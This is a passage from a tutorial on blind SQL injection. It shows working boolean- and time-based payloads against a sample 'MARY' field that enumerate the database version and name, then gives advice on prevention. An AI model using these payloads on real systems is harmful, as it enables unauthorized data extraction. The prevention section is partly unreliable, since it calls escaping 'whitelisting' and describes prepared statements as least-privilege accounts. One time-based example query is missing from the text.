This type of SQL injection does not show any kind of error. That’s why it is called a Blind SQL injection. In this type of injection, the attacker relies on the response type from the server or the time it takes to get a response from the server. That is why there are 2 types in Blind SQL Injection.
In the Boolean-Based injection, the server responds with a True or False response. The attacker will modify the query according to the response of the server and will reveal information about the database.
For example, as we saw in Error-Based SQL injection the server will respond with “exists or not exists” response.
From the Error-Based injection, we know that name MARY exists in the database so we will modify our query to MARY’ AND 1=1;--, which will generate the following response.
Alternatively, feeding MARY’ AND 1=2;-- will return not exist as MARY exists in the database but 1=2 is false.
We can use the same method to find out the version of the database using the following query.
MARY' and substring(@@version,1,1)=1;--
If the first character of the version of the database is 1 then this will generate a positive response.for the second character we can use the following query.
MARY' and substring(@@version,2,1)=1;--
We can also know the name of the database. First, we need to know the length of the name of the database. We can do it from the following query.
MARY’ and length(database())=1;--
We can increment the trailing value until we get a positive response from the server.
To find out the characters in the database name we can try the following query.
MARY' and substring(database(),1,1)='a';--
We can replace the last character with all the alphabets until we get a positive response.
We can change the value after the database() to check for that particular character, i.e.
MARY' and substring(database(),2,1)='a';--
In the Time-Based Blind SQL injection, the attacker relies on the time it takes to get a response from the server. For example, consider the following query.
The above input will force a 10-second delay in the response. We can expand on this concept by doing the following query.
MARY' and if((select+@@version) like "10%",sleep(2),null);--
If the response comes in two seconds, it means that the version starts with “10.” The “like” string operator we used in the query is designed to make a character-by-character comparison.
Preventing SQL Injection:-
SQL injection has 2 root causes:
- Not validating the input before constructing the query.
- Including user input in building dynamic queries.
To lessen the problem, we need to enforce input validation and resort to prepared statements in combination with other protection methods.
1. Validating user-supplied input:-
There are 2 possible ways to validate user-supplied inputs.
- Blacklist the Input
- Whitelist the Input
For both methods, we have to prepare a list of characters that will be blacklisted or whitelisted.
Blacklisting the input means that you don’t accept the characters from the list in the input, i.e. JS validation.
Whitelisting the input means that you escape the characters from the list in the input
From the two Whitelisting is more preferable.
Blacklisting is not a recommended way to protect against SQL Injection because it is highly prone to failure. It works as long as the developer can make sure that the user input fields accept no special characters, other than what’s required.
2. Prepared Statements:-
This means that you execute the queries from the user who has minimum rights to execute it. This will soften the impact of an SQL injection attack. For example, A user who only has the right to read the database will only be able to access the data not alter or delete it in the case the application is compromised.
3. Additional layers of security:-
Solutions like a Web Application Firewall (WAF) can help as an extra measure of protection against SQL Injection attacks. WAFs inspect traffic at the application level and can determine whether it’s bad or not. Maintenance is required as signatures need to be updated, otherwise, attackers can find a way to bypass the WAF.